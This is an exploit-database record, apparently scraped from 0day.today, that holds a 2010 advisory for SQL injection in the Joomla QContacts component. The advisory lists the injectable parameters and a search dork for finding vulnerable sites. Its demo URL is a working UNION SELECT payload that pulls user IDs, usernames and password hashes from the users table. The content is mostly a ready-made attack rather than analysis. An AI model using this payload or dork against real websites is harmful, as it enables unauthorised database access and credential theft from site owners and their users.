{"id": "1337DAY-ID-13320", "lastseen": "2018-04-04T21:34:03", "viewCount": 28, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-04-04T21:34:03", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-04T21:34:03", "rev": 2}, "vulnersScore": 0.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/13320", "description": "Exploit for php platform in category web applications", "title": "Joomla Component com_qcontacts SQL Injection Vulnerability", "cvelist": [], "sourceData": "==========================================================\r\nJoomla Component com_qcontacts SQL Injection Vulnerability\r\n==========================================================\r\n\r\n\r\n# Exploit Title: Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability\r\n# Date: 12, July 2010\r\n \r\n# Author: _mlk_\r\n# Software Link: http://bugsec.googlecode.com/files/Joomla_com_qcontacts.zip\r\n# Version: 1.0.4 and previous\r\n# Tested on: all OS\r\n \r\n# CVE : 0\r\n \r\n# Code : here\r\n \r\nJoomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability\r\n \r\n#################################################################################################################\r\n \r\n \r\n [+] Discovered by : _mlk_ (Renan)\r\n \r\n [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs\r\n \r\n [+] Homepages : http://code.google.com/p/bugsec/\r\n http://botecounix.com.br/blog/\r\n http://c0d3rs.wordpress.com/\r\n \r\n [+] Location : Porto Alegre - RS, Brasil\r\n (or Brazil)\r\n \r\n#################################################################################################################\r\n \r\n \r\n [-] Information\r\n \r\n [?] Script : QContacts\r\n \r\n [?] FAQ : http://www.latenight-coding.com/joomla-addons/qcontacts.html\r\n \r\n [?] Versions Tested: 1.0.4 and previous\r\n \r\n [?] Dork/String : \"index.php?option=com_qcontacts\" / \"com_qcontacts\"\r\n \r\n [?] Date : 12, July 2010\r\n \r\n \r\n-----------------------------------------------------------------------------------------------------------------\r\n \r\n \r\n [*] Parameters vuls :\r\n \r\n Itemid\r\n id\r\n catid\r\n \r\n \r\n-----------------------------------------------------------------------------------------------------------------\r\n \r\n \r\n [*] Example :\r\n \r\n http://localhost/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]\r\n http://localhost/[PATH]/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]\r\n \r\n \r\n-----------------------------------------------------------------------------------------------------------------\r\n \r\n \r\n [*] Demo :\r\n \r\n http://<server>/path/index.php?option=com_qcontacts&view=contact&id=1&Itemid=-541\r\n +union+select+concat(id,0x3a,name,0x3a,username,0x3a,password)+from+cms01_users--\r\n \r\n \r\n#################################################################################################################\r\n \r\n \r\n [~] Agradecimentos :\r\n \r\n Deus , Familiares , Amigos e Tricolor Ga?cho (Gr?mio) .\r\n Em especial \"i4k\" ( alien \\o/ ) .\r\n \r\n \r\n#################################################################################################################\r\n\r\n\n\n# 0day.today [2018-04-04] #", "published": "2010-07-13T00:00:00", "references": [], "reporter": "_mlk_", "modified": "2010-07-13T00:00:00", "href": "https://0day.today/exploit/description/13320"}

{}